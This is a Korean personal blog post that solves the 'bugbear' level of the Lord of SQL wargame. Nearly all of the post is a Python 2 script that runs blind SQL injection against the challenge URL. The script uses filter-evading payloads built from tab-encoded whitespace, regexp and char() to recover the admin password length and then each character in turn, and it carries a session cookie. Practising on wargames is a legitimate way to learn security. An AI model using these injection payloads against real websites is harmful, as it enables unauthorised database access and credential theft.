LOS bugbear

Wargame/Lord of SQL 2018. 2. 8. 22:07

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no="+data
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=4781bkenk59ojptdqpoj0um423')
    response = urllib2.urlopen(req).read()
    print str(response)

    if "Hello admin" in str(response):
        return True
    else:
        return False

length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"

for i in range(0,50):
    payload = "1%09||%091%09regexp%091%09%26%26%09id%09regexp%09concat(char(97),char(100),char(109),char(105),char(110))%09%26%26%09length(pw)%09regexp%09"+str(i)
    if request(payload)==True:
        length = i
        break

print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    for i in range(48,127):
        if (i>57 and i<65) or (i>90 and i<97):
            continue
        payload = "1%09||%091%09regexp%091%09%26%26%09id%09regexp%09concat(char(97),char(100),char(109),char(105),char(110))%09%26%26%09right(left(pw,"+str(j)+"),1)%09regexp%09char("+str(i)+")"
        if request(payload)==True:
            admin_pw += chr(i)
            print "[-]Admin Password = " + admin_pw
            break

print "[*]Admin Password = " + admin_pw

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS assassin (0)	2018.02.08
LOS giant (0)	2018.02.08
LOS darknight (0)	2018.02.08
LOS golem (0)	2018.02.08
LOS skeleton (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

LOS bugbear

'Wargame > Lord of SQL' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바